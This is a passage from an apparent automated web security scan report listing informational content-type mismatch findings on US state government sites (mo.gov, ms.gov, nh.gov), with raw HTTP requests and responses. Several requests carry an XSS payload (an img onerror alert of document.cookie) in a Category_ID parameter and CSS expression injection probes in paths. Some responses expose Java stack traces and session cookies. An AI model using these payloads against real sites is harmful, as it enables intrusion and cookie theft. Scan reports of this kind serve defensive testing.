Cookie: __utmz=59250609.1304162038.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59250609.68601831.1304162038.1304162038.1304162038.1; __utmc=59250609; __utmb=59250609.1.10.1304162038

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:35 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 01:02:54 GMT
ETag: "2819f32-47e-403feb80"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=604800, public
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

30.234. http://www.mo.gov/wp-content/uploads/2011/04/CW150_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mo.gov
Path:   /wp-content/uploads/2011/04/CW150_logo.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /wp-content/uploads/2011/04/CW150_logo.gif HTTP/1.1
Host: www.mo.gov
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:47 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 15:21:23 GMT
ETag: "1c61a8c-1537-2d6c22c0"
Accept-Ranges: bytes
Content-Length: 5431
Cache-Control: max-age=604800, public
Connection: close
Content-Type: image/gif

.PNG
.
...IHDR...P...P.............PLTE..v.kc...j#E.++.pp* ]..............X83gU L......!.]....!!.xy.kk.CC.%%..................XUv.<@....JKHDv...%!a.||.[[.cb.(.....&%.;<gd........rr.`d....UT.........
...[SNIP]...

30.235. http://www.ms.gov/a  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /a

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /a HTTP/1.1
Host: www.ms.gov
Proxy-Connection: keep-alive
Referer: http://www.ms.gov/ms_sub_template.jsp?Category_ID=46e740%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ea3b5706621b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 41
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:55:08 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /a

30.236. http://www.ms.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.ms.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000IR5EHNxWBpUhViAYMe_JD1G:-1; __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; __utmc=63443123; __utmb=63443123.1.10.1304126862

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 318
content-type: text/plain
date: Sat, 30 Apr 2011 01:34:40 GMT
last-modified: Wed, 29 Dec 2010 16:14:18 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A40ADF7D0A0C1A16441A441A5C80AA87
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHbawrepnyqoMCPYo4LfJhMbVEvWvWLG+4yAr1zBA66GGTW6fxMP1tIz6+y+Y+wPBJpFhgfN376rwPIaJRHfBxGaqnx+PP+4qoU2K57cMqRTd

..............(.......(....... ...................................................................................................g......."&......ff....""fg....fffg....fffg....&ffg....&ffg....&fff....
...[SNIP]...

30.237. http://www.ms.gov/how_do_i_fulllist.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /how_do_i_fulllist.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /how_do_i_fulllist.jsp HTTP/1.1
Host: www.ms.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1; __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; __utmc=63443123; __utmb=63443123.2.10.1304126862;

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-length: 2223
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:38:03 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A66A6D3A0A0C1A16441A441AE2822A11
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHXS0LWb4JUmSQGBP39pv/5tMnyoqXIiDEf1E3kxDkhBLcvsIFODLZmfTfryY8kNBd48FrzEoq7Tdc85xVpBd/JLWQAvQGWj0QwXCLOFPSxWu
Set-Cookie: JSESSIONID=0000Cg_PhPwo65Y5H8nQ6kbZOsH:-1; Path=/


<!--
Exception:
java.lang.NullPointerException
   at com.ibm._jsp._how_5F_do_5F_i_5F_fulllist._jspService(_how_5F_do_5F_i_5F_fulllist.java:344)
   at com.ibm.ws.jsp.runtime.HttpJspBase.service
...[SNIP]...

30.238. http://www.ms.gov/how_do_i_sub_answer_page.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /how_do_i_sub_answer_page.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /how_do_i_sub_answer_page.jsp HTTP/1.1
Host: www.ms.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1; __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; __utmc=63443123; __utmb=63443123.2.10.1304126862;

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-length: 2249
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:38:03 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A66A6F400A0C1A16441A441ADDE8D1CF
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHXS0LWb4JUmSQGBP39pv/5tpo7BNoXtBnh8auN/0QyeN2Vh8RdYKO8hyoVmp78QLir6R1YI/Ed62rgEvMEqkt4IwtqKjzb509iiKN2Fe+Xjcal09hXwPEI7Wrr5lXGwnDQ==
Set-Cookie: JSESSIONID=000032mh8mmm_F0tKy929UjXxyg:-1; Path=/


<!--
Exception:
java.lang.NullPointerException
   at com.ibm._jsp._how_5F_do_5F_i_5F_sub_5F_answer_5F_page._jspService(_how_5F_do_5F_i_5F_sub_5F_answer_5F_page.java:396)
   at com.ibm.ws.jsp.r
...[SNIP]...

30.239. http://www.ms.gov/images/hdr_  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /images/hdr_ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ms.gov

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 51
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:56:25 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_

30.240. http://www.ms.gov/images/hdr_'  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_'

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /images/hdr_' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ms.gov

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 56
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:56:12 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_&#39;

30.241. http://www.ms.gov/images/hdr_'%20stYle='x:expre/**/ssion(netsparker(9)).gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_'%20stYle='x:expre/**/ssion(netsparker(9)).gif

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /images/hdr_'%20stYle='x:expre/**/ssion(netsparker(9)).gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ms.gov

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 119
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:56:22 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_&#39; stYle=&#39;x:expre/**/ssion&#40;netsparker&#40;9&#41;&#41;.gif

30.242. http://www.ms.gov/images/hdr_46e740  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_46e740

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /images/hdr_46e740 HTTP/1.1
Host: www.ms.gov
Proxy-Connection: keep-alive
Referer: http://www.ms.gov/ms_sub_template.jsp?Category_ID=46e740%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ea3b5706621b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 57
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:55:08 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_46e740

30.243. http://www.ms.gov/images/hdr_featured_sites_  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_featured_sites_

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /images/hdr_featured_sites_ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ms.gov

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 66
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:56:25 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_featured_sites_

30.244. http://www.ms.gov/images/hdr_featured_sites_'  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_featured_sites_'

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /images/hdr_featured_sites_' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ms.gov

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 71
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:56:12 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_featured_sites_&#39;

30.245. http://www.ms.gov/images/hdr_featured_sites_'%20stYle='x:expre/**/ssion(netsparker(9)).gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_featured_sites_'%20stYle='x:expre/**/ssion(netsparker(9)).gif

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /images/hdr_featured_sites_'%20stYle='x:expre/**/ssion(netsparker(9)).gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ms.gov

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 134
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:56:22 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_featured_sites_&#39; stYle=&#39;x:expre/**/ssion&#40;netsparker&#40;9&#41;&#41;.gif

30.246. http://www.ms.gov/images/hdr_featured_sites_46e740  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_featured_sites_46e740

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /images/hdr_featured_sites_46e740 HTTP/1.1
Host: www.ms.gov
Proxy-Connection: keep-alive
Referer: http://www.ms.gov/ms_sub_template.jsp?Category_ID=46e740%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ea3b5706621b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 72
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:55:11 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_featured_sites_46e740

30.247. http://www.ms.gov/images/hdr_how_do_i_  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_how_do_i_

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /images/hdr_how_do_i_ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ms.gov

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 60
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:56:25 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_how_do_i_

30.248. http://www.ms.gov/images/hdr_how_do_i_'  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_how_do_i_'

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /images/hdr_how_do_i_' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ms.gov

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 65
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:56:12 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_how_do_i_&#39;

30.249. http://www.ms.gov/images/hdr_how_do_i_'%20stYle='x:expre/**/ssion(netsparker(9)).gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_how_do_i_'%20stYle='x:expre/**/ssion(netsparker(9)).gif

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /images/hdr_how_do_i_'%20stYle='x:expre/**/ssion(netsparker(9)).gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ms.gov

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 128
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:56:22 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_how_do_i_&#39; stYle=&#39;x:expre/**/ssion&#40;netsparker&#40;9&#41;&#41;.gif

30.250. http://www.ms.gov/images/hdr_how_do_i_46e740  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_how_do_i_46e740

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /images/hdr_how_do_i_46e740 HTTP/1.1
Host: www.ms.gov
Proxy-Connection: keep-alive
Referer: http://www.ms.gov/ms_sub_template.jsp?Category_ID=46e740%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ea3b5706621b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 66
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:55:09 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_how_do_i_46e740

30.251. http://www.ms.gov/images/hdr_online_services_  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_online_services_

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /images/hdr_online_services_ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ms.gov

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 67
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:56:25 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_online_services_

30.252. http://www.ms.gov/images/hdr_online_services_'%20stYle='x:expre/**/ssion(netsparker(9)).gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_online_services_'%20stYle='x:expre/**/ssion(netsparker(9)).gif

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /images/hdr_online_services_'%20stYle='x:expre/**/ssion(netsparker(9)).gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ms.gov

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 135
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:56:22 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_online_services_&#39; stYle=&#39;x:expre/**/ssion&#40;netsparker&#40;9&#41;&#41;.gif

30.253. http://www.ms.gov/images/hdr_online_services_46e740  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /images/hdr_online_services_46e740

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /images/hdr_online_services_46e740 HTTP/1.1
Host: www.ms.gov
Proxy-Connection: keep-alive
Referer: http://www.ms.gov/ms_sub_template.jsp?Category_ID=46e740%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ea3b5706621b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 73
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:55:10 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /images/hdr_online_services_46e740

30.254. http://www.ms.gov/ms_sub_sub_template.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /ms_sub_sub_template.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /ms_sub_sub_template.jsp HTTP/1.1
Host: www.ms.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1; __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; __utmc=63443123; __utmb=63443123.2.10.1304126862;

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-length: 2175
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:38:04 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A66A70870A0C1A16441A441A7740D041
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHUG1V9zgQBAvmGanPPuAtYanTqd7tLguoSy1xO10uBKEhigTjyA+jTMjiOzXK3S8HFPBCbIHSyyFb+3RsTQakYONP5JWEpsdchIFlN7FRi4A
Set-Cookie: JSESSIONID=0000C0jbp_VXrzKWjMaZspUuOvL:-1; Path=/


<!--
Exception:
java.lang.NullPointerException
   at com.ibm._jsp._ms_5F_sub_5F_sub_5F_template._jspService(_ms_5F_sub_5F_sub_5F_template.java:491)
   at com.ibm.ws.jsp.runtime.HttpJspBase.ser
...[SNIP]...

30.255. http://www.ms.gov/pics/amlogo.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /pics/amlogo.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pics/amlogo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ms.gov

Response

HTTP/1.1 404 Not Found
content-language: en-US
content-length: 55
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 11:56:14 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
$wsep:

Error 404: SRVE0190E: File not found: /pics/amlogo.gif

30.256. http://www.nh.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nh.gov
Path:   /favicon.ico

Issue detail

